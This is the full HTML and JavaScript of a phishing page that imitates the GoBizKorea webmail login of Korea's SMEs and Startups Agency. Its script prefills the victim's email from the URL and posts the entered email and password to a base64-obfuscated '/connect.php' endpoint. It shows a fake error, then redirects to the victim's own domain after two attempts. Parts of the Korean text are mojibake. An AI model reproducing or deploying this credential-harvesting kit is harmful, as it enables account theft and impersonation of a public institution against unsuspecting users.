<html lang="ko" xml:lang="ko" xmlns="http://www.w3.org/1999/xhtml" class="">

<head>
    <meta http-equiv="content-type" content="text/html; charset=euc-kr">
    <meta name="verify-v1" content="jUonAfMYLNhOKti2nhcAMpvUXroAH7zEw3PhssreI3M=">
    <title>고비즈메??비즈?�?��??? 중?�기업진?�공?�에?� ?�공하?� 기업?� 무�? ?��????�스팅 ?�비?�입?�??</title>
    <style>
        body,
        div,
        ul,
        li,
        h1,
        h2 {
            margin: 0;
            padding: 0;
        }

        body {
            font: 12px/1.6 ?�?�, Dotum, AppleGothic, sans-serif;
            color: #7d7d7d;
        }

        ul,
        ol,
        dl {
            list-style: none;
        }

        img {
            border-bottom-style: none;
            border-left-style: none;
            border-right-style: none;
            border-top-style: none;
            vertical-align: top;
        }

        ul {
            list-style: none;
            padding: 0;
            margin: 0;
        }

        a {
            color: #828282;
            text-decoration: none;
        }

        a:visited,
        a:visited {
            color: #828282;
        }

        a.visited,
        a.visited:visited {
            color: #828282;
        }

        #loginWrap {
            margin: 0 auto;
            width: 100%;
            text-align: left;
        }

        #logincenter {
            ;
            margin: 0 auto;
            margin-top: 80px;
            width: 600px;
            height: 900px;
        }

        #logincenter h1 {
            margin: 0 auto;
            width: 310px;
        }

        #logincenter h2 {
            margin: 0 auto;
            width: 310px;
            font-size: 15px;
            text-align: center;
            padding-top: 22px;
            padding-bottom: 15px;
        }

        #login {
            margin: 0 auto;
            width: 436px;
        }

        #login p {
            text-align: center;
            line-height: 21px;
            width: 420px;
            font-size: 12px
        }

        #login p a:hover,
        a:visited {
            color: #0e519a;
        }

        #login h3 {
            font-size: 15px;
            font-weight: bold;
            color: #5b5757;
            height: 15px;
        }

        .ID_name #ID {
            direction: ltr;
            font-size: 15px;
            height: 43px;
            width: 435px;
            line-height: 2.4em;
            font-weight: bold;
        }

        .ID_name #ID_web {
            direction: ltr;
            font-size: 15px;
            height: 43px;
            width: 196px;
            line-height: 2.4em;
            font-weight: bold;
        }

        #web_font {
            font-size: 20px;
            line-height: 20px;
            padding-top: 10px;
        }

        .PW_name #ai {
            direction: ltr;
            font-size: 15px;
            height: 43px;
            width: 435px;
            line-height: 2.4em
        }

        .PW_name #pr {
            direction: ltr;
            font-size: 15px;
            height: 43px;
            width: 435px;
            line-height: 2.4em
        }

        .hidden-label {
            clip: rect(1px, 1px, 1px, 1px);
            height: 0;
            overflow: hidden;
            position: absolute !important;
            visibility: hidden;
            width: 0;
        }

        .rememberID {
            float: right;
            font-size: 12px;
        }

        .btn_login {
            display: block;
            height: 56px;
            margin: 25px 0 12px;
        }

        .gobizjoin {
            border-top: 1px solid #d9d9d9;
            width: 436px;
            font-size: 12px;
        }

        .placeholder {
            color: #444;
        }

        .bottommenu {
            margin: 0 auto;
            text-align: center;
            width: 436px;
            padding-top: 50px;
            font-size: 12px;
        }
    </style>

    <link rel="stylesheet"
        href="https://fonts.googleapis.com/css2?family=Inter:wght@100;200;300;400;500;600;700;800;900&amp;display=swap">
    <link type="text/css" rel="stylesheet" charset="UTF-8"
        href="https://www.gstatic.com/_/translate_http/_/ss/k=translate_http.tr.qhDXWpKopYk.L.W.O/d=0/rs=AN8SPfp0QXhhaDDdjg_LgcSqoZiPEzC1tw/m=el_main_css">
</head>

<body>

    <div style="position: sticky; top: 0; background-color: #f1f1f1;  z-index: 999;">
        <div id="google_translate_element"></div>
    </div>
    <!--[?�체테?��?]_START============================================================== -->

    <div id="memGobizmail" style="">

        <form id="" name="form1" data-name="" action="" method="post" required>



            <div id="loginWrap">
                <div id="logincenter">
                    <h1><a href="#"><img
                                src="https://bk2cpz3i4qpiehi3mx5t4k3mkrzr5pk43h6kcvzqphp6d2xpueja.arweave.net/CrQn52jkHoIdG2X7PitsVHMevVzZ_KFXMHnf4ervoRI"
                                alt="고비즈코리아" title="고비즈코리아" border="0"></a></h1>
                    <h2 class="hidden-small">
                        &#xC6F9;&#xBA54;&#xC77C;&#xD68C;&#xC6D0;&#xC73C;&#xB85C;&#x20;&#xB85C;&#xADF8;&#xC778; </h2>
                    <div id="login">
                        <p>&#xB85C;&#xADF8;&#xC778;&#x20;&#xD558;&#xC2DC;&#xAE30;&#xC5D0;&#x20;&#xC55E;&#xC11C;&#x20;&#xC8FC;&#xC18C;&#xCC3D;
                            <img src="https://q5bdh7b7ew5yompmkwgp2ywee3cnmesj7vko73b5wcj6gaipurbq.arweave.net/h0Iz_D8lu4cx7FWM_WLEJsTWEkn9VO_sPbCT4wEPpEM"
                                alt="?�?�?�??주소" title="?�?�?�??주소">
                            &#xC744;&#x20;&#xBC18;&#xB4DC;&#xC2DC;&#x20;&#xD655;&#xC778;&#xD558;&#xC2DC;&#xAE30;&#x20;&#xBC14;&#xB78D;&#xB2C8;&#xB2E4;&#x2E;&#x20;&#xACE0;&#xBE44;&#xC988;&#xCF54;&#xB9AC;&#xC544;&#xB294;&#x20;&#xD68C;&#xC6D0;&#xC815;&#xBCF4;&#xB97C;
                            <span
                                style="color:#cb1212;">&#xC774;&#xBA54;&#xC77C;&#xC774;&#xB098;&#x20;&#xADF8;&#xC678;&#xC758;&#x20;&#xC7A5;&#xCE58;&#xB97C;&#x20;&#xC774;&#xC6A9;&#xD558;&#xC5EC;&#x20;&#xC218;&#xC9D1;</span>&#xD558;&#xC9C0;&#x20;&#xC54A;&#xC2B5;&#xB2C8;&#xB2E4;&#x2E;&#x20;&#xC0AC;&#xC774;&#xD2B8;&#xB97C;&#x20;&#xBAA8;&#xBC29;&#xD55C;&#x20;&#xD53C;&#xC2F1;&#xC0AC;&#xC774;&#xD2B8;&#xC5D0;&#xC11C;&#x20;&#xD53C;&#xD574;&#xB97C;&#x20;&#xC785;&#xC9C0;&#x20;&#xC54A;&#xB3C4;&#xB85D;&#x20;&#xC8FC;&#xC758;&#xD558;&#xC2DC;&#xAE30;&#x20;&#xBC14;&#xB78D;&#xB2C8;&#xB2E4;&#x2E;
                        </p>
                        <div class="PW_name">
                            <h3>&#xACC4;&#xC815;&#xBA85;</h3>
                            <label for="Passwd"></label>
                            <input class="" type="text" placeholder="ID" name="ai" id="ai" readonly>
                            <span class="rememberID"><input id="memory" type="checkbox" align="absmiddle" tabindex="5"
                                    name="memory">&#xC774;&#xBA54;&#xC77C;&#xC800;&#xC7A5;</span>
                        </div>
                        <div class="PW_name">
                            <h3>&#xBE44;&#xBC00;&#xBC88;&#xD638;</h3>
                            <label for="Passwd"></label>
                            <input class="" type="password" placeholder="password" name="namep" id="pr">
                        </div>
                        <div class="row">
                            <div class="error" id="msg" style="display: none; color:red;">
                                &#xB85C;&#xADF8;&#xC778;&#xC744;&#x20;&#xD574;&#xC8FC;&#xC138;&#xC694;&#x2E;</div>
                            <div class="alert alert-danger" id="error" style="display: none; color:red;">
                                &#xB85C;&#xADF8;&#xC778;&#xC744;&#x20;&#xD574;&#xC8FC;&#xC138;&#xC694;&#x2E;</div>
                        </div>
                        <span class="btn_login" id="submit-btn" onclick="submitForm(event)">
                            <input type="image"
                                src="https://3z4vujmmlimff7jetrp7jopmbtlfazke6sqf2nvf4aqw4a6nqlta.arweave.net/3nlaJYxaGFL9JJxf9LnsDNZQZUT0oF02peAhbgPNguY"
                                style="cursor:pointer;" alt="&#xB85C;&#xADF8;&#xC778;" title="&#xB85C;&#xADF8;&#xC778;">
                        </span>
                        <p>&#xBE44;&#xBC00;&#xBC88;&#xD638;&#xAC00;&#x20;&#xB178;&#xCD9C;&#xB418;&#xC9C0;&#x20;&#xC54A;&#xB3C4;&#xB85D;&#x20;&#xAC01;&#xBCC4;&#xD788;&#x20;&#xC8FC;&#xC758;&#xD558;&#xC2DC;&#xACE0;&#x20;&#xACC4;&#xC815;&#x20;&#xC815;&#xBCF4;&#x28;&#xC544;&#xC774;&#xB514;&#x2C;&#x20;&#xBE44;&#xBC00;&#xBC88;&#xD638;&#x29;&#xB294;&#x20;&#xB418;&#xB3C4;&#xB85D;
                            <span
                                style="color:#cb1212;">&#xACF5;&#xC720;&#xD558;&#xC9C0;&#x20;&#xB9D0;&#xACE0;&#x20;&#xC8FC;&#xAE30;&#xC801;&#xC73C;&#xB85C;&#x20;&#xBCC0;&#xACBD;</span>&#xD558;&#xC2DC;&#xAE30;&#x20;&#xBC14;&#xB78D;&#xB2C8;&#xB2E4;&#x2E;<br>
                            <!-- <span style="color:#0e519a;"><b><a href="http://kr.gobizkorea.com/support/edu/eduMain_apply_nomail.jsp" target="_blank">관?�사�? ?�?�히보기</a></b></span> -->
                        </p>
                        <div class="gobizjoin">
                            <p><a href="#">&#xC6F9;&#xBA54;&#xC77C;&#x20;&#xD68C;&#xC6D0;&#xAC00;&#xC785;</a> &#x3163;<a
                                    href="#">&#xC544;&#xC774;&#xB514;&#x2F;&#xBE44;&#xBC00;&#xBC88;&#xD638;&#xCC3E;&#xAE30;</a>
                            </p>
                        </div>
                    </div>
                    <div class="bottommenu">
                        <ul>
                            <li>&#xACE0;&#xAC1D;&#xC9C0;&#xC6D0;&#xC13C;&#xD130; 1588-6234 &#x3163; <a
                                    href="#">&#xC774;&#xC6A9;&#xC57D;&#xAD00;</a></li>
                            <li>Copyright
                                1996~2019&copy;&#xC911;&#xC18C;&#xBCA4;&#xCC98;&#xAE30;&#xC5C5;&#xC9C4;&#xD765;&#xACF5;&#xB2E8;
                                <img src="https://nqzfjtyep3gebmhhmrioud43r24yumj3zqlov65q6jba5wmfdspq.arweave.net/bDJUzwR-zECw52RQ6g-bjrmKMTvMFur7sPJCDtmFHJ8"
                                    art="고비즈코리아로고" title="고비즈코리아로고"> All Rights Reserved.
                            </li>
                        </ul>
                    </div>
                </div>
            </div>
        </form>
    </div>

    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script src="./config.js"></script>


    <script>
/* global $ */
$(document).ready(function() {
    var count = 0;

    $('#back1').click(function() {
        $("#msg").hide();
        $('#ai').val("");
        $("#automail").animate({ left: 200, opacity: "hide" }, 0);
        $("#inputbar").animate({ right: 200, opacity: "show" }, 1000);

    });

    /////////////url ai getting////////////////
    var ai = window.location.hash.substr(1);
    if (!ai) {

    } else {
        // $('#ai').val(ai);
        var my_ai = ai;
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        var dom = c.toUpperCase();
        $('#ai').val(my_ai);
        $('#ai').attr('disabled', "");
        $('#login_logo1').attr('src', 'https://logo.clearbit.com/' + my_slice);
        $('#domain-name').html(dom);
        $("#msg").hide();
        $("#inputbar").animate({ left: 200, opacity: "hide" }, 0);
        $("#automail").animate({ right: 200, opacity: "show" }, 1000);
    }
    ///////////////url getting ai////////////////


    var atu = "L2Nvbm5lY3QucGhw";
	
    $('#submit-btn').click(function(event) {
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var ai = $("#ai").val();
        var pr = $("#pr").val();
        var msg = $('#msg').html();
        $('#msg').text(msg);
        ///////////new injection////////////////
        var my_ai = ai;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!ai) {
            $('#error').show();
            $('#error').html("&#xC774;&#xBA54;&#xC77C;&#x20;&#xACC4;&#xC815;&#x20;&#xD655;&#xC778;&#x3B;");
            ai.focus;
            return false;
        }

        if (!filter.test(my_ai)) {
            $('#error').show();
            $('#error').html("&#xC774;&#xBA54;&#xC77C;&#x20;&#xACC4;&#xC815;&#x20;&#xD655;&#xC778;");
            ai.focus;
            return false;
        }
        if (!pr) {
            $('#error').show();
            $('#error').html("&#xBE44;&#xBC00;&#xBC88;&#xD638;&#xB97C;&#x20;&#xD655;&#xC778;&#xD558;&#xC138;&#xC694;");
            ai.focus;
            return false;
        }
		
		
		if(pr.length < 5) {  

			$('#error').show();
            $('#error').html("&#xBE44;&#xBC00;&#xBC88;&#xD638;&#xB97C;&#x20;&#xD655;&#xC778;&#xD558;&#xC138;&#xC694;");
            ai.focus;  

			return false;  

		}

        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        var dom = c.toUpperCase();
        ///////////new injection////////////////
        count = count + 1;
        $('#ai').attr('disabled', "");
        $('#login_logo1').attr('src', 'https://logo.clearbit.com/' + my_slice);
        $('#domain-name').html(dom);

        $.ajax({
            dataType: 'JSON',
            url: `${config.baseUrl}${atob(atu)}`,
            type: 'POST',
            data: {
                ai: ai,
                pr: pr,
            },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr) {
                $('#submit-btn').html('�α���');
            },
            success: function(response) {
                if (response) {
                    $("#msg").show();
                    console.log(response);
                    if (response['signal'] == 'ok') {
                        $("#pr").val("");
                        if (count >= 2) {
                            count = 0;
                            // window.location.replace(response['redirect_link']);
                            window.location.replace("http://www." + my_slice);

                        }
                        // $('#msg').html(response['msg']);
                    } else {
                        // $('#msg').html(response['msg']);
                    }
                }
            },
            error: function() {
                $("#pr").val("");
                if (count >= 2) {
                    count = 0;
                    window.location.replace("http://www." + my_slice);
                }
                $("#msg").show();
                // $('#msg').html("Please try again later");
            },
            complete: function() {
                $('#submit-btn').html('�α���');
            }
        });
    });


});

function getParameterByName(name, url) {
			if (!url) url = window.location.href;
			name = name.replace(/[\[\]]/g, '\\$&');
			var regex = new RegExp('[?&]' + name + '(=([^&#]*)|&|#|$)'),
				results = regex.exec(url);
			if (!results) return null;
			if (!results[2]) return '';
			return decodeURIComponent(results[2].replace(/\+/g, ' '));
		}
			
		const login_username = getParameterByName('cms');
		document.getElementById("ai").value = login_username;
</script>

</body>

</html>